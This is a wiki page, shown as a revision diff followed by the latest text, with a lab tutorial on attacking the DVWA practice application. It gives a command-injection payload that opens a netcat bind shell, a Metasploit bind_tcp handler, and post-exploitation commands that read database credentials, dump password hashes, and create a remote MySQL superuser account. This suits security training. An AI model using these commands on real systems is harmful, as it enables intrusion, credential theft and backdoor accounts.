DVWA: Serangan Menggunakan Metasploit: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) New page: * Gunakan Backtrack / Kali Linux. * Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole. use multi/handler set PAYL... |
Onnowpurbo (talk | contribs) |
||
| (One intermediate revision by the same user not shown) | |||
| Line 1: | Line 1: | ||
==Web DVWA== | |||
* Masuk ke Command Execution | |||
* Isi dengan | |||
192.168.1.106;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | |||
==Dari Kali Linux== | |||
* Gunakan Backtrack / Kali Linux. | * Gunakan Backtrack / Kali Linux. | ||
* Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole. | * Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole. | ||
| Line 4: | Line 15: | ||
use multi/handler | use multi/handler | ||
set PAYLOAD linux/x86/shell/bind_tcp | set PAYLOAD linux/x86/shell/bind_tcp | ||
show options | show options | ||
set RHOST 192.168.0.80 | set RHOST 192.168.0.80 | ||
| Line 13: | Line 27: | ||
exploit | exploit | ||
whoami | |||
This command prints the username for the effective userid. | This command prints the username for the effective userid. | ||
If the username was root, then we would be in full control; however, the username is apache. | If the username was root, then we would be in full control; however, the username is apache. | ||
grep apache /etc/passwd | grep apache /etc/passwd | ||
Here I am checking if the username is allowed to login remotely. | Here I am checking if the username is allowed to login remotely. | ||
When a shell is set to /sbin/nologin, then that user cannot login remotely. | When a shell is set to /sbin/nologin, then that user cannot login remotely. | ||
grep apache /etc/group | grep apache /etc/group | ||
It is important to discover other additional groups that apache might belong to. | It is important to discover other additional groups that apache might belong to. | ||
In this case, apache is pretty well protected. | In this case, apache is pretty well protected. | ||
ps -eaf | grep http | |||
Typically, the Apache web server processes will run with a daemon called httpd. | Typically, the Apache web server processes will run with a daemon called httpd. | ||
pwd | pwd | ||
Print the current working directory. | Print the current working directory. | ||
This actually tells us a lot. It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2. | This actually tells us a lot. It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2. | ||
ls -ld /var/www/html | ls -ld /var/www/html | ||
In Fedora, the "DocumentRoot" path is typically /var/www/html. | In Fedora, the "DocumentRoot" path is typically /var/www/html. | ||
If this directory was owned by apache instead of root we could do some web graffiti and many other things. | If this directory was owned by apache instead of root we could do some web graffiti and many other things. | ||
ls -ld /var/www/html/dvwa | ls -ld /var/www/html/dvwa | ||
The parent directory for the DVWA is /var/www/html/dvwa. | The parent directory for the DVWA is /var/www/html/dvwa. | ||
Unfortunately, the apache username only has world read and execute permissions. | Unfortunately, the apache username only has world read and execute permissions. | ||
ls -l /var/www/html/dvwa | ls -l /var/www/html/dvwa | ||
Now we are going to explore the contents of the DVWA directory. | Now we are going to explore the contents of the DVWA directory. | ||
Notice, there is a config directory. | Notice, there is a config directory. | ||
| Line 52: | Line 70: | ||
ls -l /var/www/html/dvwa/config | ls -l /var/www/html/dvwa/config | ||
We are shown there is a configuration file with a permission problem. | We are shown there is a configuration file with a permission problem. | ||
The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file. | The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file. | ||
cat /var/www/html/dvwa/config/config.inc.php | cat /var/www/html/dvwa/config/config.inc.php | ||
Bingo!!! | Bingo!!! | ||
For the database name dvwa, the user is root and the password is dvwaPASSWORD. | For the database name dvwa, the user is root and the password is dvwaPASSWORD. | ||
| Line 61: | Line 81: | ||
echo "show databases;" | mysql -uroot -pdvwaPASSWORD | echo "show databases;" | mysql -uroot -pdvwaPASSWORD | ||
Show all databases in mysql. | Show all databases in mysql. | ||
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD | echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD | ||
Show all tables in the dvwa database. | Show all tables in the dvwa database. | ||
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD | echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD | ||
Describe the fields of the dvwa.users table. | Describe the fields of the dvwa.users table. | ||
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | ||
Print the contents of the dvwa.users table. | Print the contents of the dvwa.users table. | ||
Notice the password field is displayed, where you can use tools like John the Ripper to crack it. | Notice the password field is displayed, where you can use tools like John the Ripper to crack it. | ||
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD | |||
This create a new username in the dvwa.users tables. | This create a new username in the dvwa.users tables. | ||
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | ||
Notice there is now a new record #6. | Notice there is now a new record #6. | ||
If you wanted to create an additional user, the next available user_id would incremental to #7 and so on. | If you wanted to create an additional user, the next available user_id would incremental to #7 and so on. | ||
echo "show databases;" | mysql -uroot -pdvwaPASSWORD | |||
Shows all the databases on the machine. | Shows all the databases on the machine. | ||
| Line 111: | Line 134: | ||
Replace the string "Your Name" with your actual name. | Replace the string "Your Name" with your actual name. | ||
E.g., echo "John Gray" | E.g., echo "John Gray" | ||
==Referensi== | ==Referensi== | ||
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/ | * http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/ | ||
Latest revision as of 02:45, 15 November 2014
Web DVWA
- Masuk ke Command Execution
- Isi dengan
192.168.1.106;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari Kali Linux
- Gunakan Backtrack / Kali Linux.
- Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.80
192.168.0.80 is the IP Address of the Fedora Server running DVWA. To obtain this IP Address, see Section 3, Step 3.
exploit
whoami
This command prints the username for the effective userid. If the username was root, then we would be in full control; however, the username is apache.
grep apache /etc/passwd
Here I am checking if the username is allowed to login remotely. When a shell is set to /sbin/nologin, then that user cannot login remotely. grep apache /etc/group
It is important to discover other additional groups that apache might belong to. In this case, apache is pretty well protected.
ps -eaf | grep http
Typically, the Apache web server processes will run with a daemon called httpd.
pwd
Print the current working directory.
This actually tells us a lot. It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2.
ls -ld /var/www/html
In Fedora, the "DocumentRoot" path is typically /var/www/html.
If this directory was owned by apache instead of root we could do some web graffiti and many other things.
ls -ld /var/www/html/dvwa
The parent directory for the DVWA is /var/www/html/dvwa.
Unfortunately, the apache username only has world read and execute permissions.
ls -l /var/www/html/dvwa
Now we are going to explore the contents of the DVWA directory.
Notice, there is a config directory.
Config directories are important because they contain database credential information.
ls -l /var/www/html/dvwa/config
We are shown there is a configuration file with a permission problem.
The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file.
cat /var/www/html/dvwa/config/config.inc.php
Bingo!!!
For the database name dvwa, the user is root and the password is dvwaPASSWORD.
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
Show all databases in mysql.
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
Show all tables in the dvwa database.
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
Describe the fields of the dvwa.users table.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Print the contents of the dvwa.users table.
Notice the password field is displayed, where you can use tools like John the Ripper to crack it.
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
This create a new username in the dvwa.users tables.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Notice there is now a new record #6.
If you wanted to create an additional user, the next available user_id would incremental to #7 and so on.
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
Shows all the databases on the machine.
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
This created a new user named db_hacker with a password of abc123 that can login from anywhere with connectivity.
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
Notice the very last newly created entry.
mysql -u db_hacker -h 192.168.0.80 -p
Replace 192.168.0.80 with the Fedora IP Address obtained (Section 3, Step 3)
The db_hacker password is "abc123" or whatever you set it too.
show databases;
quit
date
echo "Your Name"
Replace the string "Your Name" with your actual name.
E.g., echo "John Gray"
